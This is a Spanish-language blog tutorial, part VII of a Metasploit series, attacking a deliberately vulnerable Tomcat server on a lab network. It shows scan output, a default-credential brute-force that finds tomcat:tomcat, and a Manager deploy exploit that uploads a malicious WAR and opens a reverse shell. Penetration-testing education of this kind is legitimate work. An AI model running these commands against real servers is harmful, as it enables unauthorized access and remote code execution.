Inicio > Hacking, MetaSploit > Penetrando Sistemas bajo plataforma GNU/Linux (vulnerable) con MetaSploit FrameWork – Parte VII

Penetrando Sistemas bajo plataforma GNU/Linux (vulnerable) con MetaSploit FrameWork – Parte VII

CONCEPTOS BASICOS DE PENETRACION BAJO PLATAFORMA GNU/LINUX(VULNERABLE) USANDO METASPLOIT FRAMEWORK – PARTE VII
Atacando un Servidor Tomcat Vulnerable

Encontrando Vulnerabilidades sobre el servidor Tomcat (Puerto 8180)

Como en el caso anterior del servidor Apache, en este caso se intentará seguir un modelo similar, se intentará obtener algún tipo de vulnerabilidad por medio de Nikto y WMAP y se intentará explotarla.

Nikto:

Los resultados del escaneo con Nikto han sido:

>nikto.pl -h 192.168.1.34:8180
– Nikto v2.1.4—————————————————————————
+ Target IP: 192.168.1.34+ Target Hostname: 192.168.1.34+ Target Port: 8180+ Start Time: 2011-05-22 01:03:42—————————————————————————

+ Server: Apache-Coyote/1.1

+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)

+ OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat

+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS

+ OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server.

+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.

+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.

+ /: Appears to be a default Apache Tomcat install.

+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.

+ OSVDB-3092: /admin/: This might be interesting…

+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.

+ OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found.

+ OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found.

+ OSVDB-3092: /webdav/index.html: WebDAV support is enabled.

+ OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation.

+ /admin/account.html: Admin login page/section found.

+ /admin/controlpanel.html: Admin login page/section found.

+ /admin/cp.html: Admin login page/section found.

+ /admin/index.html: Admin login page/section found.

+ /admin/login.html: Admin login page/section found.

+ /servlets-examples/: Tomcat servlets examples are visible.

+ 6448 items checked: 0 error(s) and 19 item(s) reported on remote host

+ End Time: 2011-05-22 01:05:14 (92 seconds)

—————————————————————————

+ 1 host(s) tested

WMAP:

Los resultados del escaneo con WMAP han sido:

>wmap_run -t 192.168.1.34:8180
[*] Testing target:
[*] Site: 192.168.1.34 (192.168.1.34)
[*] Port: 8180 SSL: false============================================================[*] Testing started. Sat May 21 01:00:44 +0200 2011=[ SSL testing ]=============================================================

[*] Target is not SSL. SSL modules disabled.

=[ Web Server testing ]=

============================================================

[*] Loaded auxiliary/scanner/http/options …

[*] Loaded auxiliary/scanner/http/open_proxy …

[*] Loaded auxiliary/scanner/http/http_version …

[*] Loaded auxiliary/scanner/http/frontpage_login …

[*] Loaded auxiliary/scanner/http/vhost_scanner …

[*] Loaded auxiliary/admin/http/tomcat_utf8_traversal …

[*] Loaded auxiliary/admin/http/contentkeeper_fileaccess …

[*] Loaded auxiliary/scanner/http/webdav_internal_ip …

[*] Loaded auxiliary/scanner/http/robots_txt …

[*] Loaded auxiliary/scanner/http/webdav_website_content …

[*] Loaded auxiliary/scanner/http/webdav_scanner …

[*] Loaded auxiliary/scanner/http/svn_scanner …

[*] Loaded auxiliary/admin/http/tomcat_administration …

[*] Loaded auxiliary/scanner/http/web_vulndb …

[*] Loaded auxiliary/scanner/http/verb_auth_bypass …

=[ File/Dir testing ]=

============================================================

[*] Loaded auxiliary/scanner/http/ms09_020_webdav_unicode_bypass …

[*] Loaded auxiliary/scanner/http/file_same_name_dir …

[*] Loaded auxiliary/scanner/http/writable …

[*] Loaded auxiliary/scanner/http/copy_of_file …

[*] Loaded auxiliary/scanner/http/backup_file …

[*] Loaded auxiliary/scanner/http/replace_ext …

[*] Loaded auxiliary/scanner/http/brute_dirs …

[*] Loaded auxiliary/scanner/http/files_dir …

[*] Loaded auxiliary/scanner/http/dir_scanner …

[*] Loaded auxiliary/scanner/http/dir_listing …

[*] Loaded auxiliary/scanner/http/prev_dir_same_name_file …

[*] Loaded auxiliary/scanner/http/dir_webdav_unicode_bypass …

[*] Loaded auxiliary/scanner/http/trace_axd …

=[ Unique Query testing ]=

============================================================

[*] Loaded auxiliary/scanner/http/blind_sql_query …

[*] Loaded auxiliary/scanner/http/error_sql_injection …

=[ Query testing ]=

============================================================

=[ General testing ]=

============================================================

[*] Analysis completed in 12.7628588676453 seconds.

[*] Done.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

db_vulns

[*] Time: Thu Mar 24 23:17:45 UTC 2011 Vuln: host=192.168.1.34 name=exploit/multi/browser/java_signed_applet refs=URL-http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf

[*] Time: Fri May 20 22:29:14 UTC 2011 Vuln: host=192.168.1.34 name=exploit/unix/webapp/tikiwiki_graph_formula_exec refs=CVE-2007-5423,OSVDB-40478,BID-26006

En primera instancia WMAP no ha detectado ninguna vulnerabilidad adicional sobre este servidor, mientras que Nikto ha proporcionado mayor información, este se detallará en los siguientes pasos.

  1. La ejecución del comando ha arrojado que el servidor soporta WebDAV sin embargo no indica si se encuentra habilitado o no, por lo tanto se intenta ejecutar un escaneo para determinar si se encuentra activo
    msf > use auxiliary/scanner/http/webdav_scanner
    msf auxiliary(webdav_scanner) > show options
    Module options (auxiliary/scanner/http/webdav_scanner):
    Name Current Setting Required Description
    —- ————— ——– ———–
    Proxies no Use a proxy chainRHOSTS yes The target address range or CIDR identifierRPORT 80 yes The target port

    THREADS 1 yes The number of concurrent threads

    VHOST no HTTP server virtual host

    msf auxiliary(webdav_scanner) > set RHOSTS 192.168.1.34

    RHOSTS => 192.168.1.34

    msf auxiliary(webdav_scanner) > set RPORT 8180

    RPORT => 8180

    msf auxiliary(webdav_scanner) > run

    [*] 192.168.1.34 (Apache-Coyote/1.1) WebDAV disabled.

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    La ejecución del escaner ha indicado que WebDAV se encuentra deshabilitado en el servidor web, por lo tanto hay que seguir otro camino.

  2. Por otro lado, el contexto /admin no tiene ningún tipo de restricción, por lo tanto podría ser una oportunidad para penetrar en el servicio, de este modo se buscan módulos o exploits sobre tomcat.
msf > search tomcat
[*] Searching loaded modules for pattern ‘tomcat’…Auxiliary=========

Name Disclosure Date Rank Description

—- ————— —- ———–

admin/http/tomcat_administration normal Tomcat Administration Tool Default Access

admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability

dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS

scanner/http/tomcat_enum normal Apache Tomcat User Enumeration

scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility

Exploits

========

Name Disclosure Date Rank Description

—- ————— —- ———–

multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution

  1. Con lo anterior se ha procedido a probar los módulos para determinar cual puede proporcionar acceso al servidor.
    msf > use auxiliary/scanner/http/tomcat_mgr_login
    msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.1.35
    RHOSTS => 192.168.1.35
    msf auxiliary(tomcat_mgr_login) > set RPORT 8180
    RPORT => 8180msf auxiliary(tomcat_mgr_login) > exploit[*] 192.168.1.35:8180 – Trying username:’admin’ with password:’admin'[-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’

    [*] 192.168.1.35:8180 – Trying username:’manager’ with password:’manager’

    [-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’

    [*] 192.168.1.35:8180 – Trying username:’role1′ with password:’role1′

    [-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′

    [*] 192.168.1.35:8180 – Trying username:’root’ with password:’root’

    [-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’

    [*] 192.168.1.35:8180 – Trying username:’tomcat’ with password:’tomcat’

    [+] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’

    [*] 192.168.1.35:8180 – Trying username:’both’ with password:’both’

    [-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’

    [*] 192.168.1.35:8180 – Trying username:’j2deployer’ with password:’j2deployer’

    [-] http://192.168.1.35:8180/manager/html not responding

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

  2. Las credenciales de acceso del servicio son débiles, lo que lo hace un blanco fácil de ataque, ahora es posible ejecutar un exploit para desplegar un fichero WAR malicioso en el servidor web.
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):Name Current Setting Required Description—- ————— ——– ———–

PASSWORD no The password for the specified username

PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)

Proxies no Use a proxy chain

RHOST yes The target address

RPORT yes The target port

USERNAME no The username to authenticate as

VERBOSE false no Enable verbose output

VHOST no HTTP server virtual host

Exploit target:

Id Name

— —-

0 Automatic

msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat

PASSWORD => tomcat

msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.1.35

RHOST => 192.168.1.35

msf exploit(tomcat_mgr_deploy) > set RPORT 8180

RPORT => 8180

msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat

USERNAME => tomcat

msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_reverse_tcp

PAYLOAD => linux/x86/shell_reverse_tcp

msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.1.33

LHOST => 192.168.1.33

msf exploit(tomcat_mgr_deploy) > set LPORT 4445

LPORT => 4445

msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.1.33:4445

[*] Attempting to automatically select a target…

[*] Automatically selected target “Linux x86”

[*] Uploading 1686 bytes as mIQsM4f3wRq.war …

[*] Executing /mIQsM4f3wRq/p7yJxxlHe9RoBOEIUaO0Bc5vGrFfi.jsp…

[*] Undeploying mIQsM4f3wRq …

[*] Command shell session 2 opened (192.168.1.33:4445 -> 192.168.1.35:40989) at Sat May 21 22:02:08 +0200 2011

whoami

tomcat55

Se ha desplegado el WAR malicioso y con esto se ha conseguido una sesión reversa entre la maquina remota y la maquina del atacante

  1. Aún no hay comentarios.
  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: